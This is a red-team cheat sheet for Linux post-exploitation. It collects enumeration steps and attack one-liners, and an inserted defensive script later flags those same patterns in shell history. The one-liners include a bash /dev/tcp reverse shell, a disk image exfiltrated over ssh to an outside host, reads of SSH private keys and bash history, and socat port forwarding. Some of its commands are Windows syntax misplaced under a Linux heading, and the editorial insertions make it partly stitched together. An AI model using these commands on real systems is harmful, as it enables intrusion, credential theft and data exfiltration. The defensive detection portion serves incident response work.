Red Team Toolkit
Linux Post Exploitation Discovery

Techniques

  • Identify the current user ID and privileges
  • Identify network connections (for lateral movement)
  • Identify running processes
  • Identify cron jobs/scheduled tasks
  • Identify whether this is an Active Directory environment; if so, enumerate users/groups/computers, whether in the cloud or on-prem
  • If not AD, then find applications, firewalls and AV

Resources

Note that the following discovery commands are in Windows syntax (whoami /priv, findstr) and are carried over from the Windows discovery page; the Linux-native equivalents are id, ss -tan (or netstat -tan), arp -a or ip neigh, and ps aux.

```
whoami /priv
netstat -na | findstr "ESTABLISHED"
netstat -na | findstr "WAITING"
arp -a
systeminfo | findstr "Domain"
```

Linux Exploits

Commands

Redirect an IPv6 listening TCP port to localhost IPv4 (the trailing variable must be $PORT; the original was truncated to $POR).

```bash
IPV6ADDR=fc00:660:0:1::46 && PORT=110 && socat TCP-LISTEN:$PORT,reuseaddr,fork TCP6:[$IPV6ADDR]:$PORT
```

Find juicy stuff in the file system

```bash
find /PATH/TO/DIRECTORY -name "FILE-FILTER" -type f -exec grep -i "STRING" {} \; -print 2>/dev/null
```

Find public IP

```bash
curl -4 icanhazip.com
```

Make output easier to read

```bash
alias ccat='pygmentize -O bg=dark,style=colorful'
```

Encrypted exfil channel

```bash
dd if=/dev/rdisk0s1s2 bs=65536 conv=noerror,sync | ssh -C user@10.10.10.10 "cat >/tmp/image.dd"
```

Check a service every second

```bash
while true; do nc -vv -z -w3 10.10.10.10 80 >/dev/null && echo -e "Service is up"; sleep 1; done
```

Website cloner

```bash
wget -r -nH $URL
```

Type "gah" after you forgot to use sudo, and it will sudo your most recent command.

```bash
alias gah='sudo $(history -p \!\!)'
```

Create a reverse shell back to a given IP address and port.

```bash
bash -i >& /dev/tcp/10.10.10.10/8080 0>&1
```

Encode or decode base64 information.

```bash
echo 'Hello, World!' | base64
echo 'SGVsbG8sIFdvcmxkIQo=' | base64 -d
```

Helpful Commands

```bash
cat ~/.bash_history
cat ~/.ssh/config
cat ~/.ssh/id_rsa
cat ~/.ssh/known_hosts
```
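As an added example that is not part of the original page: a defender-side check that flags shell-history or audit-record command lines matching the one-liners collected in the Commands and Helpful Commands sections above. The pattern names and the sample history are constructed for this example.

```shell
# Added example, not from the original page: flag command lines that match the
# post-exploitation patterns collected above, for use when reviewing a recovered
# ~/.bash_history or auditd EXECVE records during incident response.

# Print the name of the first pattern a command line matches, or "clean".
classify_cmd() {
    case "$1" in
        *'/dev/tcp/'*)                      echo "bash-devtcp-shell" ;;
        *socat*TCP-LISTEN*fork*)            echo "socat-port-forward" ;;
        *'.ssh/id_rsa'*|*'.ssh/known_hosts'*|*'.ssh/config'*)
                                            echo "ssh-material-read" ;;
        *'| ssh '*'cat >'*)                 echo "ssh-piped-exfil" ;;
        *icanhazip*)                        echo "public-ip-lookup" ;;
        *)                                  echo "clean" ;;
    esac
}

# Print every flagged line of a history file as "<pattern>: <command>".
scan_history() {
    while IFS= read -r line; do
        tag=$(classify_cmd "$line")
        if [ "$tag" != "clean" ]; then
            printf '%s: %s\n' "$tag" "$line"
        fi
    done < "$1"
}

# Echo the number of flagged lines in a history file (one printf line per hit).
count_hits() {
    scan_history "$1" | wc -l | tr -d ' '
}

# Constructed sample history: two benign lines plus the page's own one-liners.
SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
ls -la /var/www
bash -i >& /dev/tcp/10.10.10.10/8080 0>&1
cat ~/.ssh/id_rsa
curl -4 icanhazip.com
IPV6ADDR=fc00:660:0:1::46 && PORT=110 && socat TCP-LISTEN:$PORT,reuseaddr,fork TCP6:[$IPV6ADDR]:$PORT
dd if=/dev/rdisk0s1s2 bs=65536 conv=noerror,sync | ssh -C user@10.10.10.10 "cat >/tmp/image.dd"
git status
EOF

scan_history "$SAMPLE"   # prints the five flagged lines, tagged by pattern
```

Run it against a real ~/.bash_history or an exported list of EXECVE command lines instead of $SAMPLE; the patterns are deliberately literal, so extend the case arms to match the tooling in your own environment.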

Linux Post Exploitation Tools

  • BusyBox

  • NMAP

  • Responder.py

  • tcpdump

  • http://www.monkey.org/~dugsong/dsniff/

  • http://www.dest-unreach.org/socat/

  • https://www.gnu.org/software/screen/

  • http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html

  • http://tgcd.sourceforge.net/

Resources

https://github.com/Arr0way/linux-local-enumeration-script
APT Privilege Escalation